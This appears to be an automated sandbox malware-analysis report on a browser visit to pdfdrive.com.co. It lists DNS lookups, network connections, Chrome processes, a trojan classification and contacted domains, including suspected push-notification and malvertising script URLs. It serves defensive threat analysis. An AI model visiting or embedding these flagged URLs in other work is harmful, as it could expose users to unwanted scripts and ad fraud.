Source: global traffic	DNS traffic detected: DNS query: bytogeticr.com
Source: global traffic	DNS traffic detected: DNS query: my.rtmark.net
Source: global traffic	DNS traffic detected: DNS query: tzegilo.com
Source: global traffic	DNS traffic detected: DNS query: cdn.larapush.com
Source: global traffic	DNS traffic detected: DNS query: flerap.com
Source: global traffic	DNS traffic detected: DNS query: fleraprt.com
Source: global traffic	DNS traffic detected: DNS query: icon-adc.realsh.xyz
Source: global traffic	DNS traffic detected: DNS query: icon.eu.ptmnd.com
Source: global traffic	DNS traffic detected: DNS query: want-some-psh.net
Source: global traffic	DNS traffic detected: DNS query: cdn4image.com
Source: global traffic	DNS traffic detected: DNS query: realpush.realsh.xyz
Source: global traffic	DNS traffic detected: DNS query: srv.eu.ptmnd.com
Source: global traffic	DNS traffic detected: DNS query: open-2-view.com
Source: global traffic	DNS traffic detected: DNS query: cu0dup0hubcc73dr63tg.controlrushprotocol.co.in
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: onmanectrictor.com
Source: global traffic	DNS traffic detected: DNS query: pushtorm.net

Source: unknown

HTTP traffic detected: POST /log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1Host: fleraprt.comConnection: keep-aliveContent-Length: 2024sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Content-Type: text/plain;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: https://pdfdrive.com.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pdfdrive.com.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:50:15 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6b21282341c3-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:50:15 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6b212deb7cf3-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: dspclick-v3.13.6.1Date: Fri, 10 Jan 2025 08:50:38 GMTContent-Length: 0Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:50:58 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6c2cfa1519aa-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:51:00 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6c3aeec55e7a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:51:14 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6c8cca6f4245-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Fri, 10 Jan 2025 08:51:15 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 8ffb6c9629cb5e61-EWR

Source: chromecache_162.2.dr	String found in binary or memory: https://8p4txvj5s68uk5.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44
Source: chromecache_160.2.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_162.2.dr	String found in binary or memory: https://bn4kb57rudcrwt.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.jquery.com/ticket/13393
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_162.2.dr	String found in binary or memory: https://code.jquery.com/jquery-3.7.1.js
Source: chromecache_162.2.dr	String found in binary or memory: https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/subscription.js
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://drafts.csswg.org/selectors/#relational
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
Source: chromecache_138.2.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://github.com/jquery/sizzle/issues/157)
Source: chromecache_94.2.dr	String found in binary or memory: https://github.com/jquery/sizzle/issues/299)
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://github.com/whatwg/html/issues/2369
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/#nonce-attributes
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://jquery.com/
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://jquery.org/license
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_160.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_146.2.dr, chromecache_94.2.dr	String found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_111.2.dr, chromecache_129.2.dr	String found in binary or memory: https://pushtorm.net/System/AddSubscriber
Source: chromecache_131.2.dr	String found in binary or memory: https://pushtorm.net/worker.js
Source: chromecache_109.2.dr	String found in binary or memory: https://srv.eu.ptmnd.com
Source: chromecache_109.2.dr	String found in binary or memory: https://srv.eu.ptmnd.com/v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/cl
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://td.doubleclick.net
Source: chromecache_160.2.dr	String found in binary or memory: https://www.google.com
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://www.googleadservices.com
Source: chromecache_160.2.dr	String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_134.2.dr, chromecache_160.2.dr	String found in binary or memory: https://www.youtube.com/iframe_api

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.45.197.107:443 -> 192.168.2.24:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.24:49844 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6256_1357358751

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6256_1357358751

Jump to behavior

Source: classification engine

Classification label: mal52.troj.win@22/134@76/27

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2168,i,12160170854791446595,9191331600167954229,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2208 /prefetch:11
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pdfdrive.com.co"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2168,i,12160170854791446595,9191331600167954229,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2208 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://pdfdrive.com.co	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1	0%	Avira URL Cloud	safe
https://srv.eu.ptmnd.com	0%	Avira URL Cloud	safe
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/subscription.js	0%	Avira URL Cloud	safe
https://srv.eu.ptmnd.com/i/click	0%	Avira URL Cloud	safe
https://bn4kb57rudcrwt.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44	0%	Avira URL Cloud	safe
https://8p4txvj5s68uk5.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44	0%	Avira URL Cloud	safe
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/sw.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
android.l.google.com	142.250.185.110	true	false	high
static.cloudflareinsights.com	104.16.79.73	true	false	high
shoordaird.com	139.45.197.107	true	false	high
bytogeticr.com	104.21.17.211	true	false	high
icon-adc.realsh.xyz	172.66.43.120	true	false	high
mobile-gtalk.l.google.com	64.233.166.188	true	false	high
open-2-view.com	108.62.157.10	true	false	unknown
cdn.larapush.com	188.114.97.3	true	false	high
my.rtmark.net	104.21.96.1	true	false	high
flerap.com	139.45.195.252	true	false	high
realpush.realsh.xyz	109.206.175.73	true	false	high
tzegilo.com	104.21.11.245	true	false	high
cdn4image.com	88.198.55.100	true	false	high
fleraprt.com	139.45.195.252	true	false	high
impressions-ico-eu.b-cdn.net	143.244.56.53	true	false	high
cu0dup0hubcc73dr63tg.controlrushprotocol.co.in	108.62.60.42	true	false	unknown
code.jquery.com	151.101.130.137	true	false	high
www.google.com	216.58.212.132	true	false	high
want-some-psh.net	178.63.248.53	true	false	high
onmanectrictor.com	188.114.96.3	true	false	high
pushtorm.net	142.132.255.57	true	false	high
clicks-eu.b-cdn.net	138.199.36.8	true	false	high
pdfdrive.com.co	104.21.92.101	true	true	unknown
site-assets.fontawesome.com	unknown	unknown	false	high
icon.eu.ptmnd.com	unknown	unknown	false	high
srv.eu.ptmnd.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://srv.eu.ptmnd.com/i/click	false	Avira URL Cloud: safe	unknown
